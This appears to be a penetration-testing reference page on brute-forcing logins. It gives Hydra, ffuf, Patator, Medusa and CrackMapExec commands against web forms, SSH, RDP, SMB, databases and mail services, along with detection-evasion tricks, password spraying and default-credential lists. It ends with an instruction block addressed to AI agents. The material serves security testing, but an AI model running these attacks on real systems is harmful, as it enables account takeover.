# Bruteforcing Authentication bruteforcing attacks to guess credentials or bypass login mechanisms. > **Skill Level**: Beginner to Intermediate\ > **Prerequisites**: Basic HTTP understanding, wordlist selection ## Password Identification ```bash # Identify hash type hash-identifier # Name That Hash (better) # https://github.com/HashPals/Name-That-Hash nth --text "5f4dcc3b5aa765d61d8327deb882cf99" # hashid hashid -m '$2a$10$...' # Shows hashcat mode ``` ## Wordlist Generation ```bash # CeWL - Generate wordlist from target website cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt cewl https://target.com --with-numbers -d 3 -w wordlist.txt # Generate password variations # https://github.com/edoardottt/longtongue python3 longtongue.py -w base_words.txt -o passwords.txt # Username wordlist from names # https://github.com/AhmedMohamedDev/namemash.py python namemash.py names.txt > usernames.txt ``` ## HTTP Bruteforcing ### Hydra ```bash # HTTP GET Form hydra -L users.txt -P passwords.txt target.com http-get-form \ "/login:username=^USER^&password=^PASS^:F=Invalid credentials" # HTTP POST Form hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \ "/login:user=^USER^&pass=^PASS^:F=Login failed" -V # HTTPS POST Form hydra -l admin -P passwords.txt target.com -s 443 -S https-post-form \ "/login:username=^USER^&password=^PASS^:F=Incorrect" # Basic Auth hydra -L users.txt -P passwords.txt target.com http-get /admin # With cookies hydra -l admin -P passwords.txt target.com http-post-form \ "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie: session=abc123" ``` ### ffuf ```bash # POST login form ffuf -w users.txt:USER -w passwords.txt:PASS \ -u https://target.com/login \ -X POST -d "username=USER&password=PASS" \ -H "Content-Type: application/x-www-form-urlencoded" \ -fc 401 -mc 200,302 # With rate limiting ffuf -w passwords.txt -u https://target.com/login \ -X POST -d "user=admin&pass=FUZZ" \ -rate 10 -fc 401 ``` ### Patator ```bash # HTTP POST patator http_fuzz url=https://target.com/login method=POST \ body='{"user":"admin","password":"FILE0"}' \ 0=/path/to/passwords.txt \ accept_cookie=1 follow=1 \ -x ignore:fgrep='Invalid' # HTTP Basic Auth patator http_fuzz url=https://target.com/admin \ user_pass=FILE0:FILE1 \ 0=users.txt 1=passwords.txt \ -x ignore:code=401 ``` ## Service Bruteforcing ### SSH ```bash hydra -l root -P passwords.txt ssh://target.com hydra -L users.txt -P passwords.txt target.com ssh -t 4 # Medusa medusa -h target.com -u root -P passwords.txt -M ssh # Ncrack ncrack -p 22 --user root -P passwords.txt target.com ``` ### RDP ```bash hydra -l administrator -P passwords.txt rdp://target.com ncrack -p 3389 --user administrator -P passwords.txt target.com # Crowbar (RDP specific) crowbar -b rdp -s target.com/32 -u admin -C passwords.txt -n 1 ``` ### FTP ```bash hydra -L users.txt -P passwords.txt ftp://target.com hydra -l anonymous -P passwords.txt target.com ftp ``` ### SMB ```bash hydra -L users.txt -P passwords.txt smb://target.com crackmapexec smb target.com -u users.txt -p passwords.txt ``` ### Database Services ```bash # MySQL hydra -l root -P passwords.txt mysql://target.com # PostgreSQL hydra -l postgres -P passwords.txt postgres://target.com # MSSQL hydra -l sa -P passwords.txt mssql://target.com # MongoDB nmap -p 27017 --script mongodb-brute target.com ``` ### Other Services ```bash # SNMP hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp # SMTP hydra -l user@target.com -P passwords.txt smtp://target.com # POP3 hydra -l user -P passwords.txt pop3://target.com # IMAP hydra -l user -P passwords.txt imap://target.com ``` ## Evasion Techniques ```bash # Slow down requests hydra -l admin -P passwords.txt target.com http-post-form "/login:..." -t 1 -w 3 # Random User-Agent hydra ... -e nsr # Try null, same as login, reversed # IP rotation (via proxychains) proxychains hydra -l admin -P passwords.txt target.com http-post-form "/login:..." # Add delays between requests ffuf -w passwords.txt -u https://target.com/login -p 0.5-1.0 ``` ## Password Spraying ```bash # Single password against many users # https://github.com/x90skysn3k/brutespray python brutespray.py --file nmap.gnmap -U users.txt -p 'Summer2024!' --threads 5 # CrackMapExec for AD crackmapexec smb dc.target.com -u users.txt -p 'Password123!' --continue-on-success # Spray single password hydra -L users.txt -p 'Welcome1!' target.com http-post-form "/login:..." ``` ## Default Credentials ```bash # Check common default credentials # https://github.com/ihebski/DefaultCreds-cheat-sheet # https://many-passwords.github.io/ # Common defaults to try: admin:admin admin:password root:root test:test guest:guest ``` ## Wordlists ```bash # Passwords /usr/share/wordlists/rockyou.txt /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt /usr/share/seclists/Passwords/darkweb2017-top10000.txt # Usernames /usr/share/seclists/Usernames/top-usernames-shortlist.txt /usr/share/seclists/Usernames/Names/names.txt ``` ## Related Topics * [Password Cracking](/others/password-cracking.md) - Hash cracking * [Wordlist Reference](/others/wordlist-reference.md) - Wordlist selection guide --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentest-book.com/enumeration/web/bruteforcing.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.